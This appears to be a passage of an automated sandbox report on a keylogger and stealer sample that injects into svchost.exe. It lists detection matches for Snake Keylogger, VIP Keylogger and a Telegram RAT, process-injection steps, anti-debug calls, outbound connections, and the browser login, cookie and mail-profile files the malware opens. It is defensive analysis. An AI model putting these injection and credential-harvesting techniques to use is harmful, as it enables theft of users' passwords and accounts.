                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: svchost.exe, 00000003.00000002.4523195747.0000000003054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: svchost.exe, 00000006.00000002.4527614360.00000000064FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: svchost.exe, 00000006.00000002.4527614360.0000000006555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeAPI call chain: ExitProcess graph end nodegraph_0-93917
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A9578 LdrInitializeThunk,3_2_081A9578
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E36AAF BlockInput,0_2_00E36AAF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DE3D19
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E13920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00E13920
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00F02F90 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F02F90
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BA100 mov eax, dword ptr fs:[00000030h]0_2_010BA100
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BB750 mov eax, dword ptr fs:[00000030h]0_2_010BB750
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BB7B0 mov eax, dword ptr fs:[00000030h]0_2_010BB7B0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133B0C8 mov eax, dword ptr fs:[00000030h]2_2_0133B0C8
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133C718 mov eax, dword ptr fs:[00000030h]2_2_0133C718
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133C778 mov eax, dword ptr fs:[00000030h]2_2_0133C778
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E1A66C
                  Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E081AC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E08189 SetUnhandledExceptionFilter,0_2_00E08189
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D48189 SetUnhandledExceptionFilter,2_2_00D48189
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D481AC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.32.1 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 132.226.247.73 80Jump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008Jump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A76008Jump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1B106 LogonUserW,0_2_00E1B106
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DE3D19
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2411C SendInput,keybd_event,0_2_00E2411C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E274E7 mouse_event,0_2_00E274E7
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\B7N48hmO78.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E1A66C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E271FA
                  Source: B7N48hmO78.exe, demonetised.exeBinary or memory string: Shell_TrayWnd
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp, demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E065C4 cpuid 0_2_00E065C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,3_2_00417A20
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E3091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00E3091D
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E5B340 GetUserNameW,0_2_00E5B340
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E11E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E11E8E
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DFDDC0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: B7N48hmO78.exe, 00000000.00000003.2051684054.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000002.2070941753.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2058142172.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2058444304.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2057687916.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2048784248.00000000010AC000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2066443218.000000000136E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2078673295.000000000134E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000002.2089593624.000000000136E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2066320567.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
